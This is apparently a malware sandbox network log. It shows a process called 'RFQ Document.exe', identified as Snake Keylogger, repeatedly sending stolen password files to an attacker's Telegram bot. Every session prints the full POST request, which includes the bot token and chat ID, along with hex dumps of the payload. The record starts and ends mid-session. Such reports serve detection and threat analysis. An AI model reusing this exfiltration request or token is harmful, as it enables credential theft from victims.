{"ok":true,"result":{"message_id":12881,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
293	192.168.2.4	50130	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:47 UTC	466	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f59bc08b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:47 UTC	467	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 39 62 63 30 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f59bc08bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:47 UTC	467	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:47 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:47 UTC	467	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12882,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
294	192.168.2.4	50131	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:47 UTC	468	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f5b39700 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:47 UTC	468	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 62 33 39 37 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f5b39700Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:47 UTC	469	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:47 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:47 UTC	469	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12884,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
295	192.168.2.4	50132	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:47 UTC	470	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f5d9be34 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:47 UTC	470	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 64 39 62 65 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f5d9be34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:48 UTC	470	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:48 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:48 UTC	471	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12885,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
296	192.168.2.4	50133	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:48 UTC	471	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f5f1944b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:48 UTC	472	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 66 31 39 34 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f5f1944bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:48 UTC	472	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:48 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:48 UTC	472	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12886,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
297	192.168.2.4	50134	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:48 UTC	473	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f60e30cf Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:48 UTC	473	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 30 65 33 30 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f60e30cfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:48 UTC	474	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:48 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:48 UTC	474	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12887,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
298	192.168.2.4	50135	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:48 UTC	474	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f6260960 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:48 UTC	475	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 32 36 30 39 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f6260960Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:48 UTC	475	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:48 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:48 UTC	475	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12888,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
299	192.168.2.4	50136	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:48 UTC	476	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f63ddf5a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:48 UTC	476	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 33 64 64 66 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f63ddf5aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:48 UTC	477	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:48 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:48 UTC	477	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12889,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49777	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:21 UTC	4	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c23319c3 Host: api.telegram.org Content-Length: 407
